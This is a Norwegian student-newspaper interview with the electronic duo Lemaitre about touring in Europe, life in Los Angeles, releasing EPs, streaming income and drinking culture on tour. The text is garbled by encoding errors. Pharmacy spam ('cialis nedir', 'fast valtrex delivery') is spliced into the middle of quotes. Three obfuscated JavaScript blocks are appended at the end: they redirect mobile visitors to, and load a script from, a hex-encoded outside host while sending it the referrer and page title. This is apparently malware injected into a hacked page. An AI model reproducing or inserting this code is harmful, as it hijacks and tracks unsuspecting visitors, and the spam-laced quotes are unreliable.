TurnAi??livets refleksjoner

Lemaitre_OL_01

VEIEN BLIR TIL MENS VI GAi??R. ai??i?? Det har ikke fungert for oss A? gA? ut med Ai??n stor plan om Ai??A?, jeg skal ha en sang som hA?res sA?nn ut, og jeg skal ha en sang som hA?res sA?nn utAi??. Vi sitter mer og eksperimenterer oss frem til noe vi virkelig liker, sier Ketil Jansen (t.h.) om Lemaitres utvikling. Her sammen med elektronikabandets andre halvdel, Ulrik Denizou Lund. FOTO: OLE LA?KKEVIK

En bransje av givende oppturer, grA?dig konsum og innlemmet drikkekultur. Elektronikabandet Lemaitre ser tilbake pA? sin seksA?rige musikalske reise.

Lemaitre
  • Norsk elektronisk band bestA?ende av Ketil Jansen og Ulrik Denizou Lund (f. 1991).
  • Opprinnelig fra Oslo, men borAi?? i Los Angeles.
  • Har utgitt en rekke EP-er, singler og remikser. Deres sang Ai??1:18Ai?? ble brukt i Apples reklame for iPhone 5c, og sangen Ai??Cut To BlackAi?? ble benyttet i Facebooks nylige 12-A?rsfeiring: Ai??Friends DayAi??.
  • Er for A?yeblikket pA? EuropaturnAi?? og skal innom Stockholm, Oslo, KA?benhavn, Berlin, Amsterdam, Paris og London.

Backstage har en gul og dunkel belysning. Det ligger en toalettmappe pA? gulvet blant sekker og ledninger. A?l stA?r framme til de som vil ha. Samt kaffe. Vann. Frukt. Elektronika-duoen Lemaitre er to dager inn i sin EuropaturnAi??. Med en ni-seters Mercedes Sprinter skal de rekke A? spille syv konserter i syv byer pA? ni dager.

Rett fra Oslo

I kveld er de i KA?benhavn og de skal pA? scenen om under en time. Studvest har fA?tt tid til en prat med Oslo-guttene Ketil Jansen og Ulrik Denizou Lund.

ai??i?? Det er klart det er spesielt A? spille pA? hjemmebane, svarer Ketil pA? spA?rsmA?let om hvordan gA?rsdagens utsolgte konsert i Oslo var.

ai??i?? Hele familien var i publikum. Bestefar ogsA?.

ai??i?? Hva synes bestefar om Lemaitre?

ai??i?? Han virket veldig happy etter konserten. Om han likte musikken eller ikke er vanskelig A? si. Jeg tror han uansett bare ble imponert over at det var sA? mange mennesker der og at det ble et sA? stort show, sier Ketil.

Den amerikanske drA?mmen

Det har nesten gA?tt seks A?r siden Ketil og Ulrik bestemte seg for A? dA?pe Ai??LemaitreAi?? ai??i?? seks A?r som fA?les mer som to, sier Ulrik.

ai??i?? Det gA?r i ett. Men det er jo ogsA? et tegn pA? at det er gA?y: At tiden flyr.

EuropaturnAi??enAi??bestA?rAi??av syv destinasjoner: Stockholm, Oslo, KA?benhavn, Berlin, Amsterdam, Paris og London. NA?r guttene ikke er pA? turnAi?? er de i Los Angeles og lager musikk i huset og hjemmestudioet sitt der.

ai??i?? Av en eller annen grunn har det alltid vAi??rt en drA?m A? flytte til LA. Jeg vet ikke hvorfor, kanskje det har noe A? gjA?re med at vi sA? sA? mye pA? Ai??EntourageAi?? (TV-serie, journ.anm.) som yngre, sier Ulrik med en seriA?s mine, men den slA?r sprekker og han fniser i begynnelsen av neste setning.

ai??i?? Vi flyttet til LA da vi signerte med plateselskapet Astralwerks som er basert i USA. De ville satse pA? oss i USA og vi ville gjerne satse i USA. Det er et veldig godt marked for det vi driver med nA?. Elektronisk musikk er stort der borte.

Av en eller annen grunn har det alltid vAi??rt en drA?m A? flytte til LA. Jeg vet ikke hvorfor, kanskje det har noe A? gjA?re med at vi sA? sA? mye pA? Ai??EntourageAi?? som yngre.

Ulrik Denizou Lund, Lemaitre
Lemaitre_OL_04

TO THE NEXT STEP. ai??i?? Streamingtallene gA?r eksponentielt oppover, noe som har nA? blitt mA?lestokken for hvordan man gjA?r det. Men vi fA?ler jo alltid at vi mA? ta det neste steg, neste steg, neste steg, gjentar Ulrik Denizou Lund om Lemaitreai??i??s fremtid. FOTO: OLE LA?KKEVIK

EP fremfor LP

Lemaitre ga nylig sinAi??syvende EP, Ai??1749Ai??. Ai?? utgi et lenger album er noe guttene har hatt i tankene i lang tid. De diskuterer imidlertidig om ikke korte og hyppige musikkutgivelser er en bedre distribusjonsmodell i dagens strA?mmekultur.

ai??i?? Med singelutgivelser kan du holde deg aktuell og fA?le deg litt mer fram med musikken. Uansett om vi kommer med noe album eller ikke, har vi lyst til A? fortsette A? slippe Ai??n og Ai??n sang. Det er mye mer befriende, i stedet for A? sitte pA? sangene i et A?r og plutselig bli lei av dem, sier Ulrik.

ai??i?? Ligger det ogsA? en frykt her for at lytterne blir utA?lmodige og dere blir glemt?

ai??i?? Det er alltid en frykt for det. Folk konsumerer musikk sA? sykt fort nA?. Man hA?rer pA? en sang i en mA?ned, kanskje to, og sA? er man ferdig med den, sier cialis nedir, cialis nedir, cialis nedir, cialis nedir, cialis nedir, cialis nedir. Ketil fA?r Ulrik bryter inn:

ai??i?? Det er jo fortsatt viktig at man tar seg god tid og at det blir kvalitet, men hvis du har en bra sang sA? er du keen pA? A? fA? den ut fort. Vi kunne sittet pA? sangene til Ai??1749Ai?? og ventet til vi hadde nok sanger til et album, men da ville vi jo sittet i et og et halvt A?r uten A? gi ut mer enn Ai??n sang. Det gA?r nesten ikke.

Folk konsumerer musikk sA? sykt fort nA?. Man hA?rer pA? en sang i en mA?ned, kanskje to, og sA? er man ferdig med den.

Ketil Jansen, Lemaitre
Vil gjA?re alle sangene gratis

Ketil og Ulrik sier at desto flere som fA?r hA?re musikken deres, desto bedre er det. Derfor har de lagt en stor del av musikken deres til gratis nedlasting pA? Soundcloud. Ulrik sier de egentlig skulle A?nske at all musikken deres var kostnadsfri, men det tillater ikke plateselskapet. Derfor er alt de har produsert fA?r de ble signert lagt ut gratis.

ai??i?? Det er ikke noen stor inntektskilde A? selge musikk. Jeg fA?ler pA? mange mA?ter at folk som kjA?per musikk pA? iTunes, i stedet for A? bruke Spotify, gjA?r det mest for A? vise en stA?tteerklAi??ring, sier Ketil.

ai??i?? Men Spotify har jo reddet det at man faktisk kan tjene penger pA? musikk. Vi tjener hvertfall litt penger pA? Spotify og mange fA?r hA?re musikken vA?r. Det er det viktigste: At musikken er tilgjengelig. Og hvis vi ogsA? kan fA? litt penger for det, blir det jo bra for alle, sier Ulrik.

Lemaitre_OL_03

GIR SEG IKKE. Ulrik Denizou Lund synes Lemaitres seksA?rige liv fA?les mer ut som to. ai??i?? Noen ganger gA?r det nesten for fort. Jeg fikk sjokk da jeg fant ut at det er fem og et halvt A?r siden vi begynte. Men vi er fortsatt unge. Vi begynte jo rett etter videregA?ende, sA? vi har fortsatt god tid til A? drive med det her. Og det gA?r jo bra! FOTO: OLE LA?KKEVIK

Alkoholens dragsug

Det er konsertvirksomhet fast valtrex delivery, fast valtrex delivery, fast valtrex delivery, fast valtrex delivery, fast valtrex delivery, fast valtrex delivery, fast valtrex delivery, fast valtrex delivery. som er den stA?rste inntektskilden til Lemaitre. Men det tar pA?. De er slitne. Enkelte ganger ai??i?? i bare noen korte sekunder ai??i?? fA?r Ketil et tomt blikk festet pA? A?lboksen som han fikler liksom likegyldig med mellom hendene. SA? kvikner han til igjen, og setter seg opp i stolen som han umerkelig har glidd litt ned i.

ai??i?? TurnAi??liv og alkohol gA?r nAi??rmest hA?nd i hA?nd, er det en problematisk side av dette?

ai??i?? Man skal passe litt pA?, sier de begge fA?r Ketil fortsetter:

ai??i?? Problemet er hvis du endelig kommer hjem fra turnAi?? og skal slappe av, men fortsetter drikkingen. Det er ikke noe vi har opplevd personlig, men det er veldig mange artister som sliter med akkurat dette. I starten er det er jo ingen som stA?r der og forteller deg at du mA? passe pA?. Du har kanskje sett at det har skjedd litt problemer med andre, men da tenker du jo fort at: Ai??Det der vil aldri skje med megAi??.

NA?r du spiller konserter hver dag, sA? begynner det A? virke som om alle du mA?ter drikker alkohol hver dag.

Ketil Jansen, Lemaitre

Vi kommer inn pA? debatten rundt artist Ida Maria BA?rli Sivertsen sin kronikk om livet som alkoholiker og hennes oppgjA?r med musikkbransjen.

ai??i?? Det er ingen som tvinger alkoholen ned i deg hver kveld. Men det var vel ikke poenget hennes heller. Det er vanskelig A? bli kastet inn i et turnAi??liv og bare automatisk skulle vite at man mA? ta en aktiv stilling til A? ikke drikke sA? mye, sier Ketil og fortsetter:

ai??i?? Det er ganske uvant i starten A? vAi??re sA? mye rundt folk som drikker, mens du selv er edru. NA?r du spiller konserter hver dag, sA? begynner det A? virke som om alle du mA?ter drikker alkohol hver dag. Det fA?les sA? naturlig A? bare ta en del av det. Men etter hvert sA? begynner du A? bli sliten og jAi??vlig hangover, og ingenting kurerer en hangover bedre enn noen pils. Da er det sykt lett A? ende opp i den onde spiralen.

Propellyder og tannpuss

Det er Ketil som er mest aktiv pA? samtaleemnet om alkoholens bakside. Moren er sosionom, og han forteller at hun har banket denne problematikken ned i hodet hans siden dag Ai??n.

ai??i?? Det er noe jeg nA? selvfA?lgelig er veldig takknemlig for, rekker han A? si fA?r det hamrer pA? dA?ren og manageren sier vi mA? Ai??wrap it upAi??. Ulrik mA? varme opp stemmen. Han gA?r energisk rundt. Synger musikkskalaer, lager propellyder med munnen og hoier i lyse toner ai??i?? nAi??rmest psykotisk. Og Ketil, han pusser tenner. Det er et ritual han mA? gjA?re fA?r hver konsert, sier han og smiler.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}